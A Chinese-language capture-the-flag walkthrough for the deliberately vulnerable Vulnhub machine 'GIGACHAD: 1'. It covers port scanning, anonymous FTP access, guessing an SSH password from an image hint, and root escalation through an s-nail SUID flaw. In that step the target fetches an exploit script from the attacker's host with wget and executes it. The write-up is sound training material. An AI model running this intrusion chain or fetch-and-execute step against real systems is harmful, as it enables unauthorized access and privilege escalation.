一、前言

主要利用方式：FTP任意用户登录获取核心路径+看图猜密码突破边界

                    suid及拥有suid权限的应用漏洞本地权限提升

二、靶机信息

靶场: vulnhub.com
靶机名称: GIGACHAD: 1
难度: easy
发布时间: 2021 年 3月 6日
下载地址：https://www.vulnhub.com/entry/gigachad-1,657/
 备注：靶机的难度是eaxy，看图猜密码也就老外能玩出花。
           挨个排查suid权限+存在漏洞应用的本地提权脚本还需要多执行几次才能成功

三、虚拟机配置
VirtualBox、网络连接模式：NAT模式、DHCP服务：启用、IP地址：自动分配

四、信息收集
1、探测靶机ip地址
└─$ sudo arp-scan -I eth0 -l

2、探测靶机ip端口及端口具体服务
└─$ sudo nmap -p- 10.0.2.12
└─$ sudo nmap -p22,80 -sV -A 10.0.2.12

3、21端口存在ftp匿名用户登录。登录后发现了一个文件

4、ftp用get下载到本地，并查看
ftp> get chadinfo

└─$ cat chadinfo

/重要提示/

        (文件提示：username is chad ，password：go to )

5、扫描一下靶机80端口的常规路径，以及访问ftp撸到的路径

6、扫描到很多路径，但访问了之后，都有固定的xx.php项目，但访问都是类似的页面

7、ftp获取到的路径
http://10.0.2.12/drippinchad.png

（通过提示与百度识图，得知图中建筑为：Maiden’s Tower
是位于土耳其最大的海港城市伊斯坦布尔的少女塔）

五、漏洞利用（突破边界）

8、猜测的第一个密码组合，然后通过22端口登录，查看id以及获取第一个flag
(用户名：chad/密码：maidenstower)
└─$ ssh chad@10.0.2.12
chad@gigachad:~$ id
chad@gigachad:~$ cat user.txt

六、提权
9、sudo 用不了，就找一下拥有suid权限

10、从下至上排查，无suid的shell命令，只能查到s-nail存在本地提权漏洞

11、下载并查看利用文件，并开启web服务，以备靶机下载

└─$ python -m http.server 80

12、靶机下载sh文件，赋权并执行.sh文件
chad@gigachad:~$ wget 10.0.2.7/47172.sh
chad@gigachad:~$ chmod 777 47172.sh

chad@gigachad:~$ ./47172.sh （要多提交几次，才能提示成功）

13、成功执行，查看id，root权限的flag，以及证明的靶机IP